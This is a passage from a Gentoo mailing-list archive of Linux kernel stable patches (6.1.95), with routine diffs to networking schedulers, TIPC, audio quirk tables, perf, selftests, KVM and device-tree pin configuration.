+-	.key_offset = offsetof(struct tcf_ct_flow_table, zone),
+-	.key_len = sizeof_field(struct tcf_ct_flow_table, zone),
++	.key_offset = offsetof(struct tcf_ct_flow_table, key),
++	.key_len = sizeof_field(struct tcf_ct_flow_table, key),
+ 	.automatic_shrinking = true,
+ };
+ 
+@@ -312,11 +317,12 @@ static struct nf_flowtable_type flowtable_ct = {
+ 
+ static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params)
+ {
++	struct zones_ht_key key = { .net = net, .zone = params->zone };
+ 	struct tcf_ct_flow_table *ct_ft;
+ 	int err = -ENOMEM;
+ 
+ 	mutex_lock(&zones_mutex);
+-	ct_ft = rhashtable_lookup_fast(&zones_ht, &params->zone, zones_params);
++	ct_ft = rhashtable_lookup_fast(&zones_ht, &key, zones_params);
+ 	if (ct_ft && refcount_inc_not_zero(&ct_ft->ref))
+ 		goto out_unlock;
+ 
+@@ -325,7 +331,7 @@ static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params)
+ 		goto err_alloc;
+ 	refcount_set(&ct_ft->ref, 1);
+ 
+-	ct_ft->zone = params->zone;
++	ct_ft->key = key;
+ 	err = rhashtable_insert_fast(&zones_ht, &ct_ft->node, zones_params);
+ 	if (err)
+ 		goto err_insert;
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 334a563e0bc14..bf8e45ffc2986 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1353,6 +1353,7 @@ static struct Qdisc *qdisc_create(struct net_device *dev,
+ 	if (ops->destroy)
+ 		ops->destroy(sch);
+ err_out3:
++	lockdep_unregister_key(&sch->root_lock_key);
+ 	netdev_put(dev, &sch->dev_tracker);
+ 	qdisc_free(sch);
+ err_out2:
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index a5693e25b2482..7053c0292c335 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -942,7 +942,9 @@ struct Qdisc *qdisc_alloc(struct netdev_queue *dev_queue,
+ 	__skb_queue_head_init(&sch->gso_skb);
+ 	__skb_queue_head_init(&sch->skb_bad_txq);
+ 	gnet_stats_basic_sync_init(&sch->bstats);
++	lockdep_register_key(&sch->root_lock_key);
+ 	spin_lock_init(&sch->q.lock);
++	lockdep_set_class(&sch->q.lock, &sch->root_lock_key);
+ 
+ 	if (ops->static_flags & TCQ_F_CPUSTATS) {
+ 		sch->cpu_bstats =
+@@ -976,6 +978,7 @@ struct Qdisc *qdisc_alloc(struct netdev_queue *dev_queue,
+ 
+ 	return sch;
+ errout1:
++	lockdep_unregister_key(&sch->root_lock_key);
+ 	kfree(sch);
+ errout:
+ 	return ERR_PTR(err);
+@@ -1062,6 +1065,7 @@ static void __qdisc_destroy(struct Qdisc *qdisc)
+ 	if (ops->destroy)
+ 		ops->destroy(qdisc);
+ 
++	lockdep_unregister_key(&qdisc->root_lock_key);
+ 	module_put(ops->owner);
+ 	netdev_put(qdisc_dev(qdisc), &qdisc->dev_tracker);
+ 
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index 67b1879ea8e10..d23f8ea630820 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -1036,13 +1036,6 @@ static void htb_work_func(struct work_struct *work)
+ 	rcu_read_unlock();
+ }
+ 
+-static void htb_set_lockdep_class_child(struct Qdisc *q)
+-{
+-	static struct lock_class_key child_key;
+-
+-	lockdep_set_class(qdisc_lock(q), &child_key);
+-}
+-
+ static int htb_offload(struct net_device *dev, struct tc_htb_qopt_offload *opt)
+ {
+ 	return dev->netdev_ops->ndo_setup_tc(dev, TC_SETUP_QDISC_HTB, opt);
+@@ -1129,7 +1122,6 @@ static int htb_init(struct Qdisc *sch, struct nlattr *opt,
+ 			return -ENOMEM;
+ 		}
+ 
+-		htb_set_lockdep_class_child(qdisc);
+ 		q->direct_qdiscs[ntx] = qdisc;
+ 		qdisc->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
+ 	}
+@@ -1465,7 +1457,6 @@ static int htb_graft(struct Qdisc *sch, unsigned long arg, struct Qdisc *new,
+ 	}
+ 
+ 	if (q->offload) {
+-		htb_set_lockdep_class_child(new);
+ 		/* One ref for cl->leaf.q, the other for dev_queue->qdisc. */
+ 		qdisc_refcount_inc(new);
+ 		old_q = htb_graft_helper(dev_queue, new);
+@@ -1728,11 +1719,8 @@ static int htb_delete(struct Qdisc *sch, unsigned long arg,
+ 		new_q = qdisc_create_dflt(dev_queue, &pfifo_qdisc_ops,
+ 					  cl->parent->common.classid,
+ 					  NULL);
+-		if (q->offload) {
+-			if (new_q)
+-				htb_set_lockdep_class_child(new_q);
++		if (q->offload)
+ 			htb_parent_to_leaf_offload(sch, dev_queue, new_q);
+-		}
+ 	}
+ 
+ 	sch_tree_lock(sch);
+@@ -1946,13 +1934,9 @@ static int htb_change_class(struct Qdisc *sch, u32 classid,
+ 		new_q = qdisc_create_dflt(dev_queue, &pfifo_qdisc_ops,
+ 					  classid, NULL);
+ 		if (q->offload) {
+-			if (new_q) {
+-				htb_set_lockdep_class_child(new_q);
+-				/* One ref for cl->leaf.q, the other for
+-				 * dev_queue->qdisc.
+-				 */
++			/* One ref for cl->leaf.q, the other for dev_queue->qdisc. */
++			if (new_q)
+ 				qdisc_refcount_inc(new_q);
+-			}
+ 			old_q = htb_graft_helper(dev_queue, new_q);
+ 			/* No qdisc_put needed. */
+ 			WARN_ON(!(old_q->flags & TCQ_F_BUILTIN));
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index a9c5b6594889b..cf9d9f9b97844 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -2107,6 +2107,7 @@ void tipc_rcv(struct net *net, struct sk_buff *skb, struct tipc_bearer *b)
+ 	} else {
+ 		n = tipc_node_find_by_id(net, ehdr->id);
+ 	}
++	skb_dst_force(skb);
+ 	tipc_crypto_rcv(net, (n) ? n->crypto_rx : NULL, &skb, b);
+ 	if (!skb)
+ 		return;
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index f1de386604a10..5ada28b5515c9 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -16,7 +16,7 @@
+ static int dsp_driver;
+ 
+ module_param(dsp_driver, int, 0444);
+-MODULE_PARM_DESC(dsp_driver, "Force the DSP driver for Intel DSP (0=auto, 1=legacy, 2=SST, 3=SOF)");
++MODULE_PARM_DESC(dsp_driver, "Force the DSP driver for Intel DSP (0=auto, 1=legacy, 2=SST, 3=SOF, 4=AVS)");
+ 
+ #define FLAG_SST			BIT(0)
+ #define FLAG_SOF			BIT(1)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 3a7104f72cabd..60866e8e1d961 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9803,6 +9803,10 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c7b, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7c, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7d, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7e, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+@@ -10079,7 +10083,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3813, "Legion 7i 15IMHG05", ALC287_FIXUP_LEGION_15IMHG05_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3818, "Lenovo C940 / Yoga Duet 7", ALC298_FIXUP_LENOVO_C940_DUET7),
+ 	SND_PCI_QUIRK(0x17aa, 0x3819, "Lenovo 13s Gen2 ITL", ALC287_FIXUP_13S_GEN2_SPEAKERS),
+-	SND_PCI_QUIRK(0x17aa, 0x3820, "Yoga Duet 7 13ITL6", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
++	SND_PCI_QUIRK(0x17aa, 0x3820, "IdeaPad 330-17IKB 81DM", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3824, "Legion Y9000X 2020", ALC285_FIXUP_LEGION_Y9000X_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3827, "Ideapad S740", ALC285_FIXUP_IDEAPAD_S740_COEF),
+ 	SND_PCI_QUIRK(0x17aa, 0x3834, "Lenovo IdeaPad Slim 9i 14ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+@@ -10090,6 +10094,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3852, "Lenovo Yoga 7 14ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3853, "Lenovo Yoga 7 15ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3855, "Legion 7 16ITHG6", ALC287_FIXUP_LEGION_16ITHG6),
++	SND_PCI_QUIRK(0x17aa, 0x3865, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x3866, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x3869, "Lenovo Yoga7 14IAL7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3902, "Lenovo E50-80", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x3977, "IdeaPad S210", ALC283_FIXUP_INT_MIC),
+@@ -10126,6 +10132,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b7d, 0xa831, "Ordissimo EVE2 ", ALC269VB_FIXUP_ORDISSIMO_EVE2), /* Also known as Malata PC-B1303 */
+ 	SND_PCI_QUIRK(0x1c06, 0x2013, "Lemote A1802", ALC269_FIXUP_LEMOTE_A1802),
+ 	SND_PCI_QUIRK(0x1c06, 0x2015, "Lemote A190X", ALC269_FIXUP_LEMOTE_A190X),
++	SND_PCI_QUIRK(0x1c6c, 0x122a, "Positivo N14AP7", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1c6c, 0x1251, "Positivo N14KP6-TG", ALC288_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d05, 0x1132, "TongFang PHxTxX1", ALC256_FIXUP_SET_COEF_DEFAULTS),
+ 	SND_PCI_QUIRK(0x1d05, 0x1096, "TongFang GMxMRxx", ALC269_FIXUP_NO_SHUTUP),
+@@ -10150,7 +10157,6 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+-	SND_PCI_QUIRK(0xf111, 0x0005, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d1e6e4208c376..d03de37e3578c 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -413,6 +413,15 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_BT_OFFLOAD_SSP(1) |
+ 					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN Transcend Gaming Laptop"),
++		},
++		.driver_data = (void *)(RT711_JD2),
++	},
++
+ 	/* LunarLake devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/tools/perf/Documentation/perf-script.txt b/tools/perf/Documentation/perf-script.txt
+index 68e37de5fae47..96ec1dec9efe3 100644
+--- a/tools/perf/Documentation/perf-script.txt
++++ b/tools/perf/Documentation/perf-script.txt
+@@ -438,9 +438,10 @@ include::itrace.txt[]
+ 	will be printed. Each entry has function name and file/line. Enabled by
+ 	default, disable with --no-inline.
+ 
+---insn-trace::
+-	Show instruction stream for intel_pt traces. Combine with --xed to
+-	show disassembly.
++--insn-trace[=<raw|disasm>]::
++	Show instruction stream in bytes (raw) or disassembled (disasm)
++	for intel_pt traces. The default is 'raw'. To use xed, combine
++	'raw' with --xed to show disassembly done by xed.
+ 
+ --xed::
+ 	Run xed disassembler on output. Requires installing the xed disassembler.
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index a794a3d2e47b7..999231d64e225 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -3712,11 +3712,25 @@ static int perf_script__process_auxtrace_info(struct perf_session *session,
+ #endif
+ 
+ static int parse_insn_trace(const struct option *opt __maybe_unused,
+-			    const char *str __maybe_unused,
+-			    int unset __maybe_unused)
++			    const char *str, int unset __maybe_unused)
+ {
+-	parse_output_fields(NULL, "+insn,-event,-period", 0);
+-	itrace_parse_synth_opts(opt, "i0ns", 0);
++	const char *fields = "+insn,-event,-period";
++	int ret;
++
++	if (str) {
++		if (strcmp(str, "disasm") == 0)
++			fields = "+disasm,-event,-period";
++		else if (strlen(str) != 0 && strcmp(str, "raw") != 0) {
++			fprintf(stderr, "Only accept raw|disasm\n");
++			return -EINVAL;
++		}
++	}
++
++	ret = parse_output_fields(NULL, fields, 0);
++	if (ret < 0)
++		return ret;
++
++	itrace_parse_synth_opts(opt, "i0nse", 0);
+ 	symbol_conf.nanosecs = true;
+ 	return 0;
+ }
+@@ -3859,7 +3873,7 @@ int cmd_script(int argc, const char **argv)
+ 		   "only consider these symbols"),
+ 	OPT_INTEGER(0, "addr-range", &symbol_conf.addr_range,
+ 		    "Use with -S to list traced records within address range"),
+-	OPT_CALLBACK_OPTARG(0, "insn-trace", &itrace_synth_opts, NULL, NULL,
++	OPT_CALLBACK_OPTARG(0, "insn-trace", &itrace_synth_opts, NULL, "raw|disasm",
+ 			"Decode instructions from itrace", parse_insn_trace),
+ 	OPT_CALLBACK_OPTARG(0, "xed", NULL, NULL, NULL,
+ 			"Run xed disassembler on output", parse_xed),
+diff --git a/tools/testing/selftests/arm64/tags/tags_test.c b/tools/testing/selftests/arm64/tags/tags_test.c
+index 5701163460ef7..955f87c1170d7 100644
+--- a/tools/testing/selftests/arm64/tags/tags_test.c
++++ b/tools/testing/selftests/arm64/tags/tags_test.c
+@@ -6,6 +6,7 @@
+ #include <stdint.h>
+ #include <sys/prctl.h>
+ #include <sys/utsname.h>
++#include "../../kselftest.h"
+ 
+ #define SHIFT_TAG(tag)		((uint64_t)(tag) << 56)
+ #define SET_TAG(ptr, tag)	(((uint64_t)(ptr) & ~SHIFT_TAG(0xff)) | \
+@@ -21,6 +22,9 @@ int main(void)
+ 	if (prctl(PR_SET_TAGGED_ADDR_CTRL, PR_TAGGED_ADDR_ENABLE, 0, 0, 0) == 0)
+ 		tbi_enabled = 1;
+ 	ptr = (struct utsname *)malloc(sizeof(*ptr));
++	if (!ptr)
++		ksft_exit_fail_msg("Failed to allocate utsname buffer\n");
++
+ 	if (tbi_enabled)
+ 		tag = 0x42;
+ 	ptr = (struct utsname *)SET_TAG(ptr, tag);
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c b/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
+index eb90a6b8850d2..f4d753185001a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
+@@ -25,7 +25,7 @@ static void test_lookup_update(void)
+ 	int map1_fd, map2_fd, map3_fd, map4_fd, map5_fd, map1_id, map2_id;
+ 	int outer_arr_fd, outer_hash_fd, outer_arr_dyn_fd;
+ 	struct test_btf_map_in_map *skel;
+-	int err, key = 0, val, i, fd;
++	int err, key = 0, val, i;
+ 
+ 	skel = test_btf_map_in_map__open_and_load();
+ 	if (CHECK(!skel, "skel_open", "failed to open&load skeleton\n"))
+@@ -102,30 +102,6 @@ static void test_lookup_update(void)
+ 	CHECK(map1_id == 0, "map1_id", "failed to get ID 1\n");
+ 	CHECK(map2_id == 0, "map2_id", "failed to get ID 2\n");
+ 
+-	test_btf_map_in_map__destroy(skel);
+-	skel = NULL;
+-
+-	/* we need to either wait for or force synchronize_rcu(), before
+-	 * checking for "still exists" condition, otherwise map could still be
+-	 * resolvable by ID, causing false positives.
+-	 *
+-	 * Older kernels (5.8 and earlier) freed map only after two
+-	 * synchronize_rcu()s, so trigger two, to be entirely sure.
+-	 */
+-	CHECK(kern_sync_rcu(), "sync_rcu", "failed\n");
+-	CHECK(kern_sync_rcu(), "sync_rcu", "failed\n");
+-
+-	fd = bpf_map_get_fd_by_id(map1_id);
+-	if (CHECK(fd >= 0, "map1_leak", "inner_map1 leaked!\n")) {
+-		close(fd);
+-		goto cleanup;
+-	}
+-	fd = bpf_map_get_fd_by_id(map2_id);
+-	if (CHECK(fd >= 0, "map2_leak", "inner_map2 leaked!\n")) {
+-		close(fd);
+-		goto cleanup;
+-	}
+-
+ cleanup:
+ 	test_btf_map_in_map__destroy(skel);
+ }
+diff --git a/tools/testing/selftests/bpf/test_tc_tunnel.sh b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+index 334bdfeab9403..365a2c7a89bad 100755
+--- a/tools/testing/selftests/bpf/test_tc_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+@@ -72,7 +72,6 @@ cleanup() {
+ server_listen() {
+ 	ip netns exec "${ns2}" nc "${netcat_opt}" -l "${port}" > "${outfile}" &
+ 	server_pid=$!
+-	sleep 0.2
+ }
+ 
+ client_connect() {
+@@ -93,6 +92,16 @@ verify_data() {
+ 	fi
+ }
+ 
++wait_for_port() {
++	for i in $(seq 20); do
++		if ip netns exec "${ns2}" ss ${2:--4}OHntl | grep -q "$1"; then
++			return 0
++		fi
++		sleep 0.1
++	done
++	return 1
++}
++
+ set -e
+ 
+ # no arguments: automated test, run all
+@@ -190,6 +199,7 @@ setup
+ # basic communication works
+ echo "test basic connectivity"
+ server_listen
++wait_for_port ${port} ${netcat_opt}
+ client_connect
+ verify_data
+ 
+@@ -201,6 +211,7 @@ ip netns exec "${ns1}" tc filter add dev veth1 egress \
+ 	section "encap_${tuntype}_${mac}"
+ echo "test bpf encap without decap (expect failure)"
+ server_listen
++wait_for_port ${port} ${netcat_opt}
+ ! client_connect
+ 
+ if [[ "$tuntype" =~ "udp" ]]; then
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 8123f4d15930c..7a4fd1dbe0d78 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -3742,12 +3742,13 @@ void kvm_vcpu_on_spin(struct kvm_vcpu *me, bool yield_to_kernel_mode)
+ {
+ 	struct kvm *kvm = me->kvm;
+ 	struct kvm_vcpu *vcpu;
+-	int last_boosted_vcpu = me->kvm->last_boosted_vcpu;
++	int last_boosted_vcpu;
+ 	unsigned long i;
+ 	int yielded = 0;
+ 	int try = 3;
+ 	int pass;
+ 
++	last_boosted_vcpu = READ_ONCE(kvm->last_boosted_vcpu);
+ 	kvm_vcpu_set_in_spin_loop(me, true);
+ 	/*
+ 	 * We boost the priority of a VCPU that is runnable but not
+@@ -3778,7 +3779,7 @@ void kvm_vcpu_on_spin(struct kvm_vcpu *me, bool yield_to_kernel_mode)
+ 
+ 			yielded = kvm_vcpu_yield_to(vcpu);
+ 			if (yielded > 0) {
+-				kvm->last_boosted_vcpu = i;
++				WRITE_ONCE(kvm->last_boosted_vcpu, i);
+ 				break;
+ 			} else if (yielded < 0) {
+ 				try--;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-21 14:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-21 14:07 UTC (permalink / raw
  To: gentoo-commits

commit:     2f30cd686b7b4c4956f6f74e8a4eab1a296bc80a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun 21 14:07:32 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun 21 14:07:32 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2f30cd68

Linux patch 6.1.95

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1094_linux-6.1.95.patch | 11396 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11400 insertions(+)

diff --git a/0000_README b/0000_README
index f71731e0..34be8944 100644
--- a/0000_README
+++ b/0000_README
@@ -419,6 +419,10 @@ Patch:  1093_linux-6.1.94.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.94
 
+Patch:  1094_linux-6.1.95.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.95
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1094_linux-6.1.95.patch b/1094_linux-6.1.95.patch
new file mode 100644
index 00000000..3ee0e61a
--- /dev/null
+++ b/1094_linux-6.1.95.patch
@@ -0,0 +1,11396 @@
+diff --git a/Makefile b/Makefile
+index 6c21684b032ee..b760de61167dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 94
++SUBLEVEL = 95
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sa8155p-adp.dts b/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
+index 4dee790f1049d..cbec4c9f31025 100644
+--- a/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
++++ b/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
+@@ -372,6 +372,16 @@ rgmii_phy: phy@7 {
+ 	};
+ };
+ 
++&pmm8155au_1_gpios {
++	pmm8155au_1_sdc2_cd: sdc2-cd-default-state {
++		pins = "gpio4";
++		function = "normal";
++		input-enable;
++		bias-pull-up;
++		power-source = <0>;
++	};
++};
++
+ &qupv3_id_1 {
+ 	status = "okay";
+ };
+@@ -389,10 +399,10 @@ &remoteproc_cdsp {
+ &sdhc_2 {
+ 	status = "okay";
+ 
+-	cd-gpios = <&tlmm 4 GPIO_ACTIVE_LOW>;
++	cd-gpios = <&pmm8155au_1_gpios 4 GPIO_ACTIVE_LOW>;
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&sdc2_on>;
+-	pinctrl-1 = <&sdc2_off>;
++	pinctrl-0 = <&sdc2_on &pmm8155au_1_sdc2_cd>;
++	pinctrl-1 = <&sdc2_off &pmm8155au_1_sdc2_cd>;
+ 	vqmmc-supply = <&vreg_l13c_2p96>; /* IO line power */
+ 	vmmc-supply = <&vreg_l17a_2p96>;  /* Card power line */
+ 	bus-width = <4>;
+@@ -488,120 +498,102 @@ &pcie1_phy {
+ &tlmm {
+ 	gpio-reserved-ranges = <0 4>;
+ 
+-	sdc2_on: sdc2_on {
+-		clk {
++	sdc2_on: sdc2-on-state {
++		clk-pins {
+ 			pins = "sdc2_clk";
+ 			bias-disable;		/* No pull */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+ 
+-		cmd {
++		cmd-pins {
+ 			pins = "sdc2_cmd";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+ 
+-		data {
++		data-pins {
+ 			pins = "sdc2_data";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+-
+-		sd-cd {
+-			pins = "gpio96";
+-			function = "gpio";
+-			bias-pull-up;		/* pull up */
+-			drive-strength = <2>;	/* 2 MA */
+-		};
+ 	};
+ 
+-	sdc2_off: sdc2_off {
+-		clk {
++	sdc2_off: sdc2-off-state {
++		clk-pins {
+ 			pins = "sdc2_clk";
+ 			bias-disable;		/* No pull */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+ 
+-		cmd {
++		cmd-pins {
+ 			pins = "sdc2_cmd";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+ 
+-		data {
++		data-pins {
+ 			pins = "sdc2_data";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+-
+-		sd-cd {
+-			pins = "gpio96";
+-			function = "gpio";
+-			bias-pull-up;		/* pull up */
+-			drive-strength = <2>;	/* 2 MA */
+-		};
+ 	};
+ 
+-	usb2phy_ac_en1_default: usb2phy_ac_en1_default {
+-		mux {
+-			pins = "gpio113";
+-			function = "usb2phy_ac";
+-			bias-disable;
+-			drive-strength = <2>;
+-		};
++	usb2phy_ac_en1_default: usb2phy-ac-en1-default-state {
++		pins = "gpio113";
++		function = "usb2phy_ac";
++		bias-disable;
++		drive-strength = <2>;
+ 	};
+ 
+-	usb2phy_ac_en2_default: usb2phy_ac_en2_default {
+-		mux {
+-			pins = "gpio123";
+-			function = "usb2phy_ac";
+-			bias-disable;
+-			drive-strength = <2>;
+-		};
++	usb2phy_ac_en2_default: usb2phy-ac-en2-default-state {
++		pins = "gpio123";
++		function = "usb2phy_ac";
++		bias-disable;
++		drive-strength = <2>;
+ 	};
+ 
+-	ethernet_defaults: ethernet-defaults {
+-		mdc {
++	ethernet_defaults: ethernet-defaults-state {
++		mdc-pins {
+ 			pins = "gpio7";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 		};
+ 
+-		mdio {
++		mdio-pins {
+ 			pins = "gpio59";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 		};
+ 
+-		rgmii-rx {
++		rgmii-rx-pins {
+ 			pins = "gpio117", "gpio118", "gpio119", "gpio120", "gpio115", "gpio116";
+ 			function = "rgmii";
+ 			bias-disable;
+ 			drive-strength = <2>;
+ 		};
+ 
+-		rgmii-tx {
++		rgmii-tx-pins {
+ 			pins = "gpio122", "gpio4", "gpio5", "gpio6", "gpio114", "gpio121";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 			drive-strength = <16>;
+ 		};
+ 
+-		phy-intr {
++		phy-intr-pins {
+ 			pins = "gpio124";
+ 			function = "emac_phy";
+ 			bias-disable;
+ 			drive-strength = <8>;
+ 		};
+ 
+-		pps {
++		pps-pins {
+ 			pins = "gpio81";
+ 			function = "emac_pps";
+ 			bias-disable;
+ 			drive-strength = <8>;
+ 		};
+ 
+-		phy-reset {
++		phy-reset-pins {
+ 			pins = "gpio79";
+ 			function = "gpio";
+ 			bias-pull-up;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts b/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
+index bb278ecac3faf..5397fba9417bb 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
++++ b/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
+@@ -475,7 +475,7 @@ &pon_resin {
+ &tlmm {
+ 	gpio-reserved-ranges = <126 4>;
+ 
+-	da7280_intr_default: da7280-intr-default {
++	da7280_intr_default: da7280-intr-default-state {
+ 		pins = "gpio42";
+ 		function = "gpio";
+ 		bias-pull-up;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 9dccecd9fcaef..bbd322fc56460 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
